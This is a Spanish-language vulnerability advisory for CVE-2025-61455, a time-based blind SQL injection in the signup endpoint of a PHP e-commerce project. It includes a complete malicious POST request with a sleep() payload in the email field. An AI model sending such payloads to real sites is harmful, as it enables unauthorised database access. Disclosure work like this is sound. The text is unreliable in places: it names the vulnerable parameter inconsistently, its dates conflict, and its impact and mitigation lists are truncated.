
Divulgación pública y prueba de concepto para CVE-2025-61455, una inyección SQL crítica en E-commerce Project v1.0, que incluye detalles técnicos, PoC y recomendaciones de mitigación.
Fecha de divulgación: 14 de octubre de 2025
ID de CVE: CVE-2025-61455
Gravedad: CRÍTICA (CVSS 9.8)
Existe una vulnerabilidad crítica de inyección SQL en E-commerce Project v1.0, específicamente en el endpoint signup.inc.php. La aplicación incorpora directamente entradas de usuario sin sanitizar en consultas SQL, lo que permite a atacantes no autenticados eludir la autenticación y ejecutar comandos SQL arbitrarios.
A este problema se le ha asignado el identificador CVE-2025-61455. En el momento de la divulgación pública, no había ningún parche oficial disponible.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpLa aplicación utiliza entradas sin sanitizar directamente en consultas SQL, sin ninguna validación de entrada ni sentencias preparadas. La vulnerabilidad existe en el parámetro aid del archivo signup.inc.php.
Un atacante puede inyectar código SQL malicioso a través del parámetro de correo electrónico, lo que permite ataques de inyección SQL ciega basados en tiempo.
Ejemplo de patrón de código vulnerable:
$query = "SELECT * FROM table WHERE email='$email'";
Esto permite cargas útiles de inyección que pueden manipular la lógica de las consultas y extraer datos sensibles.
| ID de CWE | Título |
|---|---|
| CWE-89 | Neutralización incorrecta de elementos especiales utilizados en un comando SQL |
| Puntuación | Gravedad | Cadena de vector |
|---|---|---|
| 9.8 | CRÍTICA | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Una explotación exitosa podría resultar en:
git clone https://github.com/Bhabishya-123/E-commerce.git
Usa XAMPP/LAMP para implementar el proyecto y navega a:
http://localhost/e-commerce-main/includes/signup.inc.php
Envía la siguiente solicitud HTTP maliciosa:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
Explicación:
El parámetro de correo electrónico contiene una carga útil de inyección SQL basada en tiempo: '+(select*from(select(sleep(20)))a)+'
Si la aplicación se retrasa 20 segundos antes de responder, la inyección SQL es exitosa.
mysqli_prepare() o PDO).| Evento | Fecha |
|---|---|
| Vulnerabilidad descubierta | 16 de septiembre de 2025 |
| Divulgación pública | 13 de octubre de 2025 |
| Parche disponible | ❌ No disponible al momento de la divulgación |
Esta vulnerabilidad fue descubierta y divulgada de manera responsable por:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Este aviso se publica de forma independiente debido a la falta de respuesta del proveedor.